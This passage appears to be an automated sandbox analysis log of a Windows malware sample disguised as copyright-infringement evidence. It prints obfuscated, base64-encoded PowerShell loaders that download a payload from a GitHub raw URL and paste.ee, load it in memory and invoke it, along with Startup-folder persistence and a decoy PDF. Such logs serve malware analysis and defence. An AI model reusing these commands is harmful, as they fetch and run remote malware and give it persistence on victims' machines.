G4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdfJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2p_bee.jsJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%Jump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2x_bee.jsJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::FrombaJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2p_bee.js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe 